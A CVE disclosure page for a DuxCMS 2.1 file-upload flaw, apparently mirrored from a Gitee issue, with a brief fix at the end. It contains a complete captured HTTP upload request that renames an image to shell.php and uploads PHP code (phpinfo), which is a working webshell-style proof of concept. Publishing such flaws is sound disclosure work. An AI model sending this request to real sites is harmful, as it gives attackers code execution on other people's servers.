Headline

CVE-2020-21861: Insecure configuration causes getshell · Issue #I182Y4 · 王爷/DuxCMS2.1支持php7.0以上版本 - Gitee.com

File upload vulnerability in DuxCMS 2.1 allows attackers to execute arbitrary php code via duxcms/AdminUpload/upload.

1 year ago

CVE

Open in Source

#vulnerability #windows #git #php #firefox

File type upload configuration

Add php file type to it like this

Upload file features

then find one upload file features

the file is name shell.jpg and content like this.

Capturing data packets of uploaded files,and change the file suffix to php

and the packets is like this.

POST /DuxCMS/admin.php?r=duxcms/AdminUpload/upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 853
Connection: close
Cookie: 042_sessid_ab46d60bfa95=2020-13-9np1-77uqd8wxh-a95a9743c; phpwcmsBELang=en; loader=loaded; _utcpl=17ad82836af704761d37d9a49a32770es1; __atuvc=3%7C2; PHPSESSID=u7oug0qsfdrqa6r1l5v2kr3noh

-----------------------------191691572411478
Content-Disposition: form-data; name="class_id"

0
-----------------------------191691572411478
Content-Disposition: form-data; name="id"

WU_FILE_0
-----------------------------191691572411478
Content-Disposition: form-data; name="name"

shell.jpg
-----------------------------191691572411478
Content-Disposition: form-data; name="type"

image/jpeg
-----------------------------191691572411478
Content-Disposition: form-data; name="lastModifiedDate"

2020/1/8 ä¸å4:16:35
-----------------------------191691572411478
Content-Disposition: form-data; name="size"

35
-----------------------------191691572411478
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg

<?php

phpinfo();

?>
-----------------------------191691572411478--

Access file

After getting the file uploaded above, the file address returned by the server.Successfully uploaded the php file and executed the php file.

Solution

delete this configuration features.